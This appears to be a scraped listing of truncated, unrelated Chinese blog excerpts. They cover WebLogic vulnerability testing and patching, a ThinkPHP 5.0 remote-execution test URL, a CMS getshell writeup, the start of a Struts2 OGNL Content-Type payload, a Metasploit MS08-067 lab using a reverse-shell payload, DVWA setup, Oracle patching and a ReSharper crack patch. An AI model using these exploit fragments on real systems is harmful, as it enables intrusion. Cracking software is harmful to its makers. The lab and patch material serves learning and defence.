1.漏洞测试 搭建完成weblogic12.1.3.0后,开始用工具测试 点击connect,右下角显示connected,说明已连接→说明漏洞存在 CMD输入:ls   ,然后点击Execute执行(因为环境是linux) 下图是对应环境服务器的. 2.打补丁 网上各种转来转去,参差不齐,好多说什么用bsu去打补丁,他们有些不知道,12.1.2后的版本都没有bsu这玩意了,打补丁要用opatch去打! (1)将官方下载的补丁(有账号才可以下)解压,命令:unzip p26519417_1213…
ThinkPHP5.0 漏洞测试 自从ThinkPHP发布漏洞补丁以来,服务器不知道多少次受到了批量扫描漏洞来抓取肉鸡的请求 虽然官方早已发布补丁,还是想试一下TP漏洞,测试两个漏洞 一.全版本执行漏洞 <!-- GET --> http://127.0.0.1/ThinkPHP/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]…
Title:CreateLiveCMSV4.0 漏洞,无需后台Get shell --2012-03-06 17:28 标题:CreateLive CMS Version 4.0.1006 漏洞,无需后台 Get shell 必须环境:IIS6,上传目录可执行脚本 CreateLive CMS Version 4.0.1006 是个非常古老滴CMS了. ------------------------------------------------------------------------…
此过程为jar包安装~ 需注意:fmw_12.1.3.0.0_wls.jar     需要jdk1.7.0_15以上的版本 1.安装JDK(若已装可跳过) (1)Oracle官网下载jdk linux安装包[jdk8u11linuxx64.tar.gz] (2)解压安装包命令:tar zxvf jdk-8u11-linux-x64.tar.gz (3)将已解压的文件夹移动到/usr/local/下,命令:mv jdk1.8.0_11 /usr/local/ (4)编辑系统环境变量,命令:vi /…
网站用的是struts2 的2.5.0版本 测试时参考的网站是http://www.myhack58.com/Article/html/3/62/2017/84026.htm 主要步骤就是用Burp Suite拦截一个上传过程,之后修改Content-type 网上的Content-type基本都是下面这种写法 header["Content-Type"]='''%{(#nike='multipart/form-data'). (#dm=@ognl.OgnlContext@DEFAUL…
测试脚本: # -*- coding: utf-8 -*- import socket,select,base64,os,re,time,datetime class mail: def __init__(self): self.errmsg = '' def send(self, buf): try: byteswritten = 0 while byteswritten < len(buf): byteswritten += self.__sockfd.send(buf[byteswritt…
1. 下载补丁和最新OPatchGI PSU : p25869727_112040_Linux-x86-64.zipOPatch : p6880880_112000_Linux-x86-64.zip 说明:GI PSU包括DB PSU,CPU.单机与RAC的opatch通用,单机与rac的psu不通用. 2. 检查数据库当前OPatch版本 RAC所有节点的GI home和DB home都需要检查.$ $ORACLE_HOME/OPatch/opatch version 3. 更新OPatch,…
转自:http://www.leavescn.com/Page/Content.aspx?id=94 ReSharper 10.0.0.1 Ultimate 完美破解补丁使用方法,本资源来自互联网,感谢吾乐吧软件站的分享. ReSharper是一款由jetbrains开发的针对C#, VB.NET, ASP.NET, XML, 和 XAML的编辑器.沿袭了jetbrains开发工具一贯的优良传统,ReSharper拥有高度智能的纠错,30多种高级代码重构功能,方便的单元测试 工具,快速导航.检索…
kali上部署dvwa漏洞测试平台 一.获取dvwa安装包并解压 二.赋予dvwa文件夹相应权限 三.配置Mysql数据库 四.启动apache2和mysql服务 五.在网页配置dvwa 六.登陆到DVWA 一.获取dvwa安装包并解压 1.从Github获取dvwa压缩包: wget https://github.com/ethicalhack3r/DVWA/archive/master.zip 2.解压并释放到指定文件夹 /var/www/html unzip -o -d /var/www/…
20145322何志威 Exp5 MS08_067漏洞测试 实验过程 kali ip:172.20.10.4 windows 2003 ip:172.20.10.2 在控制台内使用search ms08_067查看相关信息. 使用 show payloads ,确定攻击载荷. 使用命令 use exploit/windows/smb/ms08_067_netapi,并用 set payload generic/shell_reverse_tcp 选择 playoad,并查看相关信息 设置监听ip…